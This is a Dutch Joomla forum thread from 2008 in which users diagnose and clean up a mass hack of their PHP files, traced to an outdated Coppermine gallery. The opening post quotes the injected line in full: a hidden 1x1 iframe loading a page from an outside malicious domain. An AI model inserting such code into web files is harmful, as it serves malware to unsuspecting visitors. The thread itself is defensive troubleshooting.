website gehacked
Moderator: pe7er
Forum rules
Forum Regels
Forum Regels
- pjotr
- Joomla! Guru
- Posts: 995
- Joined: Thu Aug 18, 2005 1:00 pm
- Location: Gouda
- Contact:
website gehacked
vanmorgen kreeg ik allerlei foutmeldingen op één van mijn sites. In de statusbalk onderaan de browser zag ik een link: http://cdpuvbhfzz.com/adv598.php.
Ik ben bang dat de site is gehacked. Ook via admin kan ik niet bij de site komen.
Na wat onderzoek (via FTP) zag ik dat in verschillende files (index.php, configuration.php, globals.php (en wellicht nog veel meer files) als laatste regel is opgenomen:
<?php echo '<iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe>'; ?>
Volgens mij is dit de hack. Kan iemand vertellen of mijn veronderstelling juist is voordat ik al mijn files ga nazoeken en aanpassen?
Ik ben bang dat de site is gehacked. Ook via admin kan ik niet bij de site komen.
Na wat onderzoek (via FTP) zag ik dat in verschillende files (index.php, configuration.php, globals.php (en wellicht nog veel meer files) als laatste regel is opgenomen:
<?php echo '<iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe>'; ?>
Volgens mij is dit de hack. Kan iemand vertellen of mijn veronderstelling juist is voordat ik al mijn files ga nazoeken en aanpassen?
Last edited by pjotr on Tue Apr 08, 2008 8:25 pm, edited 2 times in total.
Peter Keijser
- dam-man
- Joomla! Exemplar
- Posts: 7961
- Joined: Fri Sep 09, 2005 2:13 pm
- Location: The Netherlands
- Contact:
Re: website gehacked?
Dit lijkt er wel op jah...
Welke versie draaide je bij deze site?
Welke versie draaide je bij deze site?
Robert Dam - Joomla Forum Moderator
Dutch Boards | Joomla Coding Boards | English Support Boards
Dutch Boards | Joomla Coding Boards | English Support Boards
- pjotr
- Joomla! Guru
- Posts: 995
- Joined: Thu Aug 18, 2005 1:00 pm
- Location: Gouda
- Contact:
Re: website gehacked?
De laatste versie 1.015dam-man wrote:Dit lijkt er wel op jah...
Welke versie draaide je bij deze site?
Ik weet in ieder geval wat ik vanavond kan gaan doen, ik zal mij wel niet vervelen.
Bedankt voor je reactie.
Peter Keijser
- pjotr
- Joomla! Guru
- Posts: 995
- Joined: Thu Aug 18, 2005 1:00 pm
- Location: Gouda
- Contact:
Re: website gehacked
Nog even een aanvullende vraag:
Volgens mijn provider staan de beveiligingsinstellingen van mijn site niet optimaal (een paar mappen zouden op 777 staan). Dit zou kunnen omdat ik wel eens wat problemen heb gehad met installeren, waarschijnlijk heb ik ze niet allemaal weer teruggezet
Maar de files met de betreffende regel staan op 644. Volgens mij is dit standaard voor deze files. Ik dacht dat een buitenstaander dan niets kon wijzigen in de file? Hoe kunnen de regels dan zijn toegevoegd?
aanvulling: Nog eens met mijn provider gebeld.
Het bleek dat ook het fotoalbum (Coppermine), dat middels de installatietool van de provider was geïnstalleerd, gehacked was. Ook bij dit programma talloze 644-files met de betreffende regels.
Volgens de provider is het met bepaalde 'tools' mogelijk 644-bestanden toch te wijzigen. Hier zou weinig aan te doen zijn.
Iemand een ander idee?
Ik heb gelukkig nog wel backups (jammer alleen dat deze een week oud zijn), maar je heb er toch weer een hoop werk aan en als de reactie van mijn provider juist is kan het dus vaker voorkomen.
Volgens mijn provider staan de beveiligingsinstellingen van mijn site niet optimaal (een paar mappen zouden op 777 staan). Dit zou kunnen omdat ik wel eens wat problemen heb gehad met installeren, waarschijnlijk heb ik ze niet allemaal weer teruggezet
Maar de files met de betreffende regel staan op 644. Volgens mij is dit standaard voor deze files. Ik dacht dat een buitenstaander dan niets kon wijzigen in de file? Hoe kunnen de regels dan zijn toegevoegd?
aanvulling: Nog eens met mijn provider gebeld.
Het bleek dat ook het fotoalbum (Coppermine), dat middels de installatietool van de provider was geïnstalleerd, gehacked was. Ook bij dit programma talloze 644-files met de betreffende regels.
Volgens de provider is het met bepaalde 'tools' mogelijk 644-bestanden toch te wijzigen. Hier zou weinig aan te doen zijn.
Iemand een ander idee?
Ik heb gelukkig nog wel backups (jammer alleen dat deze een week oud zijn), maar je heb er toch weer een hoop werk aan en als de reactie van mijn provider juist is kan het dus vaker voorkomen.
Peter Keijser
- pjotr
- Joomla! Guru
- Posts: 995
- Joined: Thu Aug 18, 2005 1:00 pm
- Location: Gouda
- Contact:
Re: website gehacked
Probleem is opgelost. Wat belangrijk is een (recente) backup toch.
Ik maakte slechts één keer per 2 à 3 weken een backup. Ik ga dit toch maar wat vaker doen.
Ik maakte slechts één keer per 2 à 3 weken een backup. Ik ga dit toch maar wat vaker doen.
Peter Keijser
Re: website gehacked?
Hoi Peter,
Is het ook duidelijk geworden hoe en/of waar ze als eerste toegang toe hebben gekregen? Uiteraard ben ik nieuwsgierig of dit de Core is geweest, dat zou betekenen dat er ergens een lek zit en dat dit directe aandacht vereist.
Mocht je nog bij de server logs kunnen zou ik geintereseerd zijn om een kopie ervan in te zien als je daarmee akkoord gaat uiteraard.
Is het ook duidelijk geworden hoe en/of waar ze als eerste toegang toe hebben gekregen? Uiteraard ben ik nieuwsgierig of dit de Core is geweest, dat zou betekenen dat er ergens een lek zit en dat dit directe aandacht vereist.
Mocht je nog bij de server logs kunnen zou ik geintereseerd zijn om een kopie ervan in te zien als je daarmee akkoord gaat uiteraard.
- pjotr
- Joomla! Guru
- Posts: 995
- Joined: Thu Aug 18, 2005 1:00 pm
- Location: Gouda
- Contact:
Re: website gehacked?
Robin,
ik zou je natuurlijk graag helpen. Waar zou ik de server-logs kunnen vinden? Of moet ik dit bij de provider opvragen?
Eventueel wil ik je wel mijn inloggegevens mailen als dit je kan helpen.
ik zou je natuurlijk graag helpen. Waar zou ik de server-logs kunnen vinden? Of moet ik dit bij de provider opvragen?
Eventueel wil ik je wel mijn inloggegevens mailen als dit je kan helpen.
Peter Keijser
Re: website gehacked?
Hoi,
Alvast dank voor de hulp. De logs zouden via een control panel bereikbaar kunnen zijn, je zou daar even kunnen kijken. Anders kan de hosting er inderdaad bij.
Alvast dank voor de hulp. De logs zouden via een control panel bereikbaar kunnen zijn, je zou daar even kunnen kijken. Anders kan de hosting er inderdaad bij.
- Ivo
- Joomla! Explorer
- Posts: 283
- Joined: Thu Aug 18, 2005 8:59 am
- Location: Netherlands
- Contact:
Re: website gehacked?
Ik heb dit probleem ook ineens sinds vanavond. Ook Iframes en een pagina die naar cpuvbhfzz.com zoekt.
Wat kan ik hieraan doen? Moet ik echt opnieuw beginnen met een schone installatie/backup?
Ik kan trouwens wel bij mijn admin-panel...
Wat kan ik hieraan doen? Moet ik echt opnieuw beginnen met een schone installatie/backup?
Ik kan trouwens wel bij mijn admin-panel...
- Ivo
- Joomla! Explorer
- Posts: 283
- Joined: Thu Aug 18, 2005 8:59 am
- Location: Netherlands
- Contact:
Re: website gehacked?
Ik zag op de coppermine forums het volgende topic: http://forum.coppermine-gallery.net/ind ... .msg250153
- pjotr
- Joomla! Guru
- Posts: 995
- Joined: Thu Aug 18, 2005 1:00 pm
- Location: Gouda
- Contact:
Re: website gehacked?
Ik dacht in het begin dat de regels slechts in een paar files voorkwamen, maar als je verder kijkt, komen ze in bijna alle php-files voor. Ik heb dus maar een backup teruggezet.
je heb dus wat te doen vanavond,
succes
je heb dus wat te doen vanavond,
succes
Peter Keijser
- Ivo
- Joomla! Explorer
- Posts: 283
- Joined: Thu Aug 18, 2005 8:59 am
- Location: Netherlands
- Contact:
Re: website gehacked?
Het voordeel is wel dat de database en ook plaatjes niet zijn geinfecteerd. Dat scheelt al een hoop.
Bij ons is het zo dat elke file die op 08-04-2008 om 20:18u is geinfecteerd. Ik probeer nu elke file die die timestamp heeft op te sporen. Vervolgens haal ik de I-frame weg en zet ik de chmod terug naar 644. Ik heb CPG direct van de site gegooid, ik hoop dat dat voldoende is.
Bij ons is het zo dat elke file die op 08-04-2008 om 20:18u is geinfecteerd. Ik probeer nu elke file die die timestamp heeft op te sporen. Vervolgens haal ik de I-frame weg en zet ik de chmod terug naar 644. Ik heb CPG direct van de site gegooid, ik hoop dat dat voldoende is.
- pjotr
- Joomla! Guru
- Posts: 995
- Joined: Thu Aug 18, 2005 1:00 pm
- Location: Gouda
- Contact:
Re: website gehacked
Is Coppermine wel de oorzaak? Ik had de fotoalbums niet via een bridge aan mijn site gekoppeld, maar stond apart geïnstalleerd en werd via een menu-optie opgeroepen.
Peter Keijser
- Ivo
- Joomla! Explorer
- Posts: 283
- Joined: Thu Aug 18, 2005 8:59 am
- Location: Netherlands
- Contact:
Re: website gehacked
Lees dat topic van hierboven maar. Ik lees overal op het net dat het een coppermine exploit is, zoek maar eens op cdpuvbhfzz.com
- Ivo
- Joomla! Explorer
- Posts: 283
- Joined: Thu Aug 18, 2005 8:59 am
- Location: Netherlands
- Contact:
Re: website gehacked
Ik heb in een van de coppermine-mappen een file genaamd 142739_298w3.zip gevonden. Toen ik deze opende in notepad bleek dit de bewuste php-file te zijn, waarvan de code ook al in het eerder genoemde topic staat. Ik ben dus blij dat ik de CPG-map direct heb weggesmeten.
Ik heb alleen nog niet alle geinfecteerde files kunnen vinden...
Ik heb alleen nog niet alle geinfecteerde files kunnen vinden...
- pe7er
- Joomla! Master
- Posts: 25057
- Joined: Thu Aug 18, 2005 8:55 pm
- Location: Nijmegen, Netherlands
- Contact:
Re: website gehacked
Erg handig om te voorkomen, maar om ook veiligheidsrisicos op te sporen (bijv. verkeerde permissies),
download: Joomla! Tools Suite (JTS-sa) & HISA (HISA-sa) http://extensions.joomla.org/component/ ... Itemid,35/
Het is een tool die je niet hoeft te installeren, maar via FTP in een aparte map op je site moet zetten,
en dan opstarten via je browser.
Achtergrond info (Engelstalig):
Joomla! Tools Suite v1.0 & Health, Installation and Security Audit Tool http://forum.joomla.org/viewtopic.php?t=136328
download: Joomla! Tools Suite (JTS-sa) & HISA (HISA-sa) http://extensions.joomla.org/component/ ... Itemid,35/
Het is een tool die je niet hoeft te installeren, maar via FTP in een aparte map op je site moet zetten,
en dan opstarten via je browser.
Achtergrond info (Engelstalig):
Joomla! Tools Suite v1.0 & Health, Installation and Security Audit Tool http://forum.joomla.org/viewtopic.php?t=136328
Kind Regards,
Peter Martin, Global Moderator
Company website: https://db8.nl/en/ - Joomla specialist, Nijmegen, Netherlands
The best website: https://the-best-website.com
Peter Martin, Global Moderator
Company website: https://db8.nl/en/ - Joomla specialist, Nijmegen, Netherlands
The best website: https://the-best-website.com
- Ivo
- Joomla! Explorer
- Posts: 283
- Joined: Thu Aug 18, 2005 8:59 am
- Location: Netherlands
- Contact:
Re: website gehacked
Ik heb alle sourcefiles van Joomla en SMF opnieuw geupload vanuit mijn laatste backup. De images, downloads en andere media heb ik laten staan. Nu draait de site weer normaal zonder exploits.
Ik heb inmiddels van mensen begrepen dat een trojan zich via onze site probeerde te laden, best serieus dus.
@ Pe7er: Bedankt, ik ga dat eens uitproberen! Zit daar toevallig ook iets van een CHMOD-tool in waarmee je snel alle files en directories de juiste rechten kunt geven?
Ik heb inmiddels van mensen begrepen dat een trojan zich via onze site probeerde te laden, best serieus dus.
@ Pe7er: Bedankt, ik ga dat eens uitproberen! Zit daar toevallig ook iets van een CHMOD-tool in waarmee je snel alle files en directories de juiste rechten kunt geven?
- Susanne
- Joomla! Apprentice
- Posts: 40
- Joined: Sat Jul 29, 2006 6:52 pm
- Contact:
Re: website gehacked
Ik had het probleem ook met een coppermine site. Ik had al een hele tijd geen updates gedaan. Dat is echt enorm belangrijk. http://forum.coppermine-gallery.net/ind ... 1.120.html
Ik kon zien dat de hack op 8 april om 20:16 uur was gedaan. Al mijn bestanden in de map van coppermine waren vervangen voor bestanden met die datum en tijd. Na het vervangen van al die bestanden voor een bestand van de laatste versie van coppermine, heb ik de hack niet meer terug gezien. Let op: in de map album staat waarschijnlijk een zip-bestand met de datum en tijd van de hack. Verwijder deze ook. Het schijnt dat de hack anders kan terug komen. Check daarna alle bestanden in alle mappen of er nog bestanden zijn met de datum en tijd van de hack. het zijn de php en html bestanden die zijn aangetast. Na deze operatie lijkt mijn galerij weer schoon. Vernieuw ook even je wachtwoorden.
Op het forum van coppermine staat een guide over hoe je moet updaten. Volg deze. Bij mij werkte het.
Ik kon zien dat de hack op 8 april om 20:16 uur was gedaan. Al mijn bestanden in de map van coppermine waren vervangen voor bestanden met die datum en tijd. Na het vervangen van al die bestanden voor een bestand van de laatste versie van coppermine, heb ik de hack niet meer terug gezien. Let op: in de map album staat waarschijnlijk een zip-bestand met de datum en tijd van de hack. Verwijder deze ook. Het schijnt dat de hack anders kan terug komen. Check daarna alle bestanden in alle mappen of er nog bestanden zijn met de datum en tijd van de hack. het zijn de php en html bestanden die zijn aangetast. Na deze operatie lijkt mijn galerij weer schoon. Vernieuw ook even je wachtwoorden.
Op het forum van coppermine staat een guide over hoe je moet updaten. Volg deze. Bij mij werkte het.
- sc00zy
- Joomla! Exemplar
- Posts: 9532
- Joined: Thu Aug 18, 2005 9:07 am
- Location: Assen, Netherlands
- Contact:
Re: website gehacked
Mod: Verplaatst van Algemene vragen naar Offtopic forum.
Arjan Menger
https://welldotcom.nl - Puntgaaf Internetbureau
https://welldotcom.nl - Puntgaaf Internetbureau